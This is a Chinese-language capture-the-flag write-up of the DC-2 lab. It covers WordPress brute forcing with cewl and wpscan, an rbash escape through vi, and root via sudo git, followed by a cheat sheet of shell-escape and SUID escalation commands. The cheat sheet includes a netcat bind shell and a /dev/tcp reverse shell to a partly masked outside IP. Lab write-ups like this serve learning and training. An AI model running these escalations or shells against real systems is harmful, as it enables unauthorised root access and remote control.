DC-2
Created: November 10, 2023 3:01 PM
Tags: WordPress, git提权, rbash逃逸
Owner: 只会摸鱼
靶场过程
信息收集
-
扫描存活主机,找到靶机ip:192.168.199.131(本机是192.168.199.129)
-
扫描端口开放协议
- 发现有80端口和7744,但80端口有重定向,尝试直接访问无法访问。 因重定向页面为http://dc-2/,固修改/etc/hosts文件,将靶机ip绑定在该网址,再次直接访问,可正常跳转。
- 发现有80端口和7744,但80端口有重定向,尝试直接访问无法访问。 因重定向页面为http://dc-2/,固修改/etc/hosts文件,将靶机ip绑定在该网址,再次直接访问,可正常跳转。
-
指纹识别
- 可尝试利用WordPress4.7的漏洞
- 使用msf模块利用无果
-
返回页面查看是否有其他信息提示
-
发现了页面提供了flag提示信息
-
提示了使用cewl 得到字典, 使用尝试使用身份登录
kali密码攻击工具——Cewl使用指南 | 码农网
-
漏洞利用
- 后台目录爆破一下,发现有login页面,访问一下,跳转到登陆页面。
-
使用cewl输出字典,到文件dicts.txt
-
因使用的是WordPress,可使用专门针对此CMS的工具WPScan进行枚举用户名,并爆破。
- 枚举用户名,得到三个用户。
- 枚举用户名,得到三个用户。
-
逐个对三个用户进行密码爆破。
-
wpscan --url dc-2 -U ‘admin,jerry,tom’ -P ~/Desktop/dicts.txt
-
只有jerry 和tom爆破出了密码
-
-
尝试登录,jerry登陆成功,找到第二个flag
- 翻译一下,让寻找其他切入点,没办法,只剩下了7744端口的ssh服务了
提权
-
尝试ssh登录,使用jerry和tom账号,使用jerry账号和密码,无论怎么尝试都无法登录,尝试使用tom账号和密码,成功登录。
- 尝试一些命令,发现都没有权限
- 尝试一些命令,发现都没有权限
-
应该是rbash,尝试rbash逃逸
-
查看有哪些命令权限
-
使用vi设置shell
-
直接输入vi进入编辑器页面,按esc+:输入命令set shell=/bin/bash回车后在输入:shell
-
回车后会弹出如下页面,即成功,接下来要配置环境变量以正常执行命令。
-
配置完,即可正常执行shell命令
-
查看flag3文件,发现提示,让使用登录tom后用su命令切换到jerry
-
使用jerry的密码尝试登陆,发现成*
-
-
-
查找flag文件
-
find / -name “*flag*”
-
找到了flag4,得到了提示, git 提权
-
使用sudo git help config打开config页面
-
输入!/bin/bash
-
-
回车后,弹出root交互shell,即成功,找到最后的flag读出。
-
rbash逃逸
rbash是什么
它与一般shell的区别在于会限制一些行为,让一些命令无法执行。
简单理解就是最低权限的用户
如何设置rbash
cp /bin/bash /bin/rbash # 复制一个bash,重命名为rbash
useradd -s /bin/rbash test # 设置用户test登陆的shell为rbash
mkdir -p /home/test/.bin # 在test用户下新建一个.bin目录存放可以执行的命令
逃逸方法
枚举Linux环境(为逃逸rbash做信息收集)
echo $PATH # 弹出当前PATH环境变量
echo 路径+ /* #路径使用最后为bin目录的,以找到当前所有可以执行的程序命令
常用逃逸技术
nmap
适用版本:nmap2.02至5.21
在早期nmap版本中,带有交互模式,因而允许用户执行shell命令
使用如下命令进入nmap交互模式:
nmap --interactive
在nmap交互模式中 通过如下命令提权
nmap> !sh
msf当中也有利用nmap进行提权的模块
exploit/unix/local/setuid_nmap
find
find比较常用,find用来在系统中查找文件。同时,它也有执行命令的能力。 因此,如果配置为使用SUID权限运行,则可以通过find执行的命令都将以root身份去运行。
提权如下:
#进入shell
find anyfile -exec '/bin/sh' \; 或者 find anyfile -exec '/bin/bash' \;
#其中find 常用
find / -exec '/bin/bash' \; 或者 find / -exec '/bin/sh' \;
linux一般都安装了nc 我们也可以利用nc 广播或反弹shell
广播shell:
find user -exec nc -lvp 4444 -e '/bin/sh' \;
#或者
find user -exec nc -lvp 4444 -e '/bin/bash' \;
在攻击机上:
nc 靶机ip 4444
反弹shell
find anyfile -exec bash -c 'bash -i >& /dev/tcp/114.xxx.xxx.96/4444 0>&1' \;
在攻击机上:
nc -lvvp 4444
Vim
vim的主要用途是做编辑器,是,如果以SUID运行,它将继承root用户的权限,因此可以读取系统上的所有文件。
vim.tiny /etc/passwd
通过vim进入shell
vim.tiny
#vim命令
:set shell = '/bin/sh'
:shell
设置环境变量
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/
Vi
通过vi进入shell
vi
#vi命令
:set shell = '/bin/sh' 或者 :set shell='/bin/bash'
:shell
设置环境变量
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/
Bash
- 方法一
BASH_CMDS设置shell
BASH_CMDS[x]=/bin/bash
#设置了个x变量shell
x
#相当于执行shell
设置一下环境变量
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/
- 方法二
以下命令将以root身份打开一个bash shell。
bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)
less
less命令也可以进入shell
less /etc/passwd
#在less中输入:
!/bin/sh 或者 !/bin/bash
more
more命令进入shell和less相同
more /etc/passwd
#在more中输入:
!/bin/sh 或者 !/bin/bash
要注意的是使用more和less一定读取一个比较大的文件,如果文件太小无法进入翻页功能也就无法使用!
命令进入shell
nano
nano也算是比较上古的文本编辑器了
nano进入shell的方法为
nano #进入nano编辑器
Ctrl + R
Ctrl + X
#即可输入命令
cp
使用cp 命令覆盖原来的/etc/passwd
文件
awk
awk命令进入shell:
awk 'BEGIN {system("/bin/bash")}'
Git提权
-
前提是执行sudo -l 提示不需要密码可以使用git命令
方法一
sudo git help config #在末行命令模式直接输入
!/bin/bash 或 !'sh' #完成提权
方法二
sudo git -p help #弹出help信息窗口
!/bin/bash #输入后,即可打开一个用户为root的shell